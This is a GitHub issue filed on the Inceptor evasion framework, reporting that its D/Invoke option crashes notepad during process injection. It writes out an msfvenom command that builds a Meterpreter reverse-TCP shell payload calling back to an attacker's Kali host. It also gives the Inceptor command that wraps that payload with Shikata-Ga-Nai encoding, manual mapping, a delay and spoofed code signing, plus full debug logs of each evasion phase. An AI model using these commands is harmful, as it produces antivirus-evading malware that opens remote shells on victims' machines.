Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

use -m dinvoke cause notepad injection address conflicts #46

Open
d0l1u opened this issue May 30, 2023 · 0 comments
Open

use -m dinvoke cause notepad injection address conflicts #46

d0l1u opened this issue May 30, 2023 · 0 comments

Comments

@d0l1u
Copy link

d0l1u commented May 30, 2023
edited

Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions

To Reproduce
my os is windows10 and VS version is VS2022
I use msfvenom to create the raw payload in kali, command as below
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
the inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15"
use command "demo.bat xx.exe" and the inject victim notepad will exit abnormally
But if I remove the options -m dinvoke, then the final compiled exe can reverse connection to kali successfully.
or if I remove the options -P, then the final compiled exe can also reverse connection to kali successfully.

Expected behavior
run "demo.bat xx.exe" and the final compiled payload can reverse connection to kali

Screenshots
If applicable, add screenshots to help explain your problem.

image

Debug Info:

  1. Go to your config.ini file
  2. In DEBUG, mark all as 1
  3. Reproduce the bug again
  4. Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------

[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
  [>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
    [*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
  [>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
  [>] Encoder Chain: HexEncoder
  [>] Shellcode size: 1228
  [>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
  [>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
  [>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"  /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"  "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe"  /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe"  "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe  C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447

  [+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
  [+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
  [+] Signed with: CarbonCopy
[*] Phase 7: Finalising
  [+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994

Additional context
Add any other context about the problem here.
@d0l1u d0l1u changed the title use -m dinvoke cause injection address conflicts use -m dinvoke cause notepad injection address conflicts May 30, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@d0l1u